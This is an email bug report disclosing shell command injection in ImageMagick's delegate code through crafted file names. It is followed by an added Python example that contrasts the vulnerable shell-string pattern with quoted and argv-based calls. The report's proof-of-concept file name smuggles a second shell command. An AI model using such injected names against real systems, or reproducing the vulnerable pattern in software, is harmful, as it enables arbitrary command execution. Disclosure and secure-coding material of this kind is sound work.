Message-ID: <email address hidden>
Date: Thu, 29 Dec 2005 22:15:19 +0100
From: Florian Weimer <email address hidden>
To: <email address hidden>
Subject: Shell command injection in delegate code (via file names)
Package: imagemagick
Version: 6.2.4.5-0.3
Tags: security
The delegate code in ImageMagick is vulnerable to shell command
injection, using specially crafted file names:
$ cp /usr/lib/openoffice/share/template/en-US/wizard/bitmap/germany.wmf \
'" ; echo "Hi!" >&2; : "'.gif
$ display '" ; echo "Hi!" >&2; : "'.gif
It should work with other file formats besides WMF (those for which
delegates are defined).
I'm leaving the severity at normal, because it doesn't seem to be
*that* important. Perhaps this is exploitable through MIME-enabled
MUAs, which would warrant a higher severity.
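
Added example, not part of the original report and not ImageMagick's own code: it contrasts the pattern the report describes (a file name pasted between double quotes in a command string that a shell runs) with two safer ways of invoking a helper. `DELEGATE` is a constructed stand-in program and the function names are hypothetical; the double-quoted template form is an assumption consistent with the file name used in the report.

```python
import shlex
import subprocess
import sys

# Constructed stand-in for a delegate program: prints the arguments it received.
DELEGATE = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]

# File name taken from the report above.
NAME = '" ; echo "Hi!" >&2; : "' + ".gif"


def run_template(name):
    """Vulnerable pattern: file name pasted between double quotes, run by sh."""
    cmd = '%s "%s"' % (shlex.join(DELEGATE), name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True)


def run_quoted(name):
    """Shell still used, but the file name is quoted as a single shell word."""
    cmd = "%s %s" % (shlex.join(DELEGATE), shlex.quote(name))
    return subprocess.run(cmd, shell=True, capture_output=True, text=True)


def run_argv(name):
    """No shell at all: the file name is exactly one argv entry."""
    return subprocess.run(DELEGATE + [name], capture_output=True, text=True)


if __name__ == "__main__":
    for fn in (run_template, run_quoted, run_argv):
        result = fn(NAME)
        print("%-12s delegate saw: %s  stderr: %r"
              % (fn.__name__, result.stdout.strip(), result.stderr.strip()))
```

In `run_template` the delegate receives an empty argument and the shell executes the rest of the file name as separate commands; in the other two the delegate receives the whole file name unchanged.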